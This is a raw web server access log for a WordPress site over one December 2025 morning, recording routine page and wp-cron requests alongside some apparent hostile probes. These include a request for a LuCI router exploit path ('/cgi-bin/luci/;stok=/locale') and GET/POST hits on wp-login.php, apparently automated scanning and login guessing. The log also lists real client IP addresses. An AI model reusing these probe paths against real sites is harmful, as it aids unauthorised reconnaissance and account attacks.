149.50.103.48 - - [09/Dec/2025:06:18:04 +0800] "GET / HTTP/1.1" 200 33627 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Dec/2025:06:31:01 +0800] "POST /wp-cron.php?doing_wp_cron=1765233061.3554539680480957031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
121.237.36.29 - - [09/Dec/2025:06:31:01 +0800] "GET / HTTP/1.1" 200 33627 "-" "Mozilla/5.0 (Linux; Android 8.0; BLA-AL00 Build/HUAWEIBLA-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/48.0.2564.116 Mobile Safari/537.36 T7/10.11 baiduboxapp/10.11.0.12 (Baidu; P1 8.0.0)"
36.133.115.36 - - [09/Dec/2025:06:36:10 +0800] "POST /wp-cron.php?doing_wp_cron=1765233370.3150839805603027343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.18 - - [09/Dec/2025:06:36:11 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
204.76.203.18 - - [09/Dec/2025:06:36:14 +0800] "GET / HTTP/1.1" 200 152382 "-" "-"
204.76.203.18 - - [09/Dec/2025:06:36:17 +0800] "GET / HTTP/1.1" 200 152382 "-" "-"
204.76.203.18 - - [09/Dec/2025:06:36:19 +0800] "GET / HTTP/1.1" 200 152382 "-" "-"
204.76.203.18 - - [09/Dec/2025:06:36:22 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [09/Dec/2025:06:45:08 +0800] "POST /wp-cron.php?doing_wp_cron=1765233908.7857370376586914062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [09/Dec/2025:06:45:08 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [09/Dec/2025:06:45:10 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31364 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [09/Dec/2025:06:46:31 +0800] "POST /wp-cron.php?doing_wp_cron=1765233991.6009960174560546875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
141.98.11.170 - - [09/Dec/2025:06:46:31 +0800] "GET / HTTP/1.1" 200 33627 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Dec/2025:06:52:04 +0800] "POST /wp-cron.php?doing_wp_cron=1765234324.7039759159088134765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
213.21.239.49 - - [09/Dec/2025:06:52:05 +0800] "POST / HTTP/1.1" 200 33627 "-" "Go-http-client/1.1"
36.133.115.36 - - [09/Dec/2025:07:00:14 +0800] "POST /wp-cron.php?doing_wp_cron=1765234814.4654769897460937500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [09/Dec/2025:07:00:14 +0800] "GET / HTTP/1.1" 200 33627 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [09/Dec/2025:07:02:00 +0800] "POST /wp-cron.php?doing_wp_cron=1765234920.4552741050720214843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
103.214.6.202 - - [09/Dec/2025:07:02:00 +0800] "GET /wp-login.php HTTP/1.1" 200 2774 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
103.214.6.202 - - [09/Dec/2025:07:02:02 +0800] "POST /wp-login.php HTTP/1.1" 200 2911 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
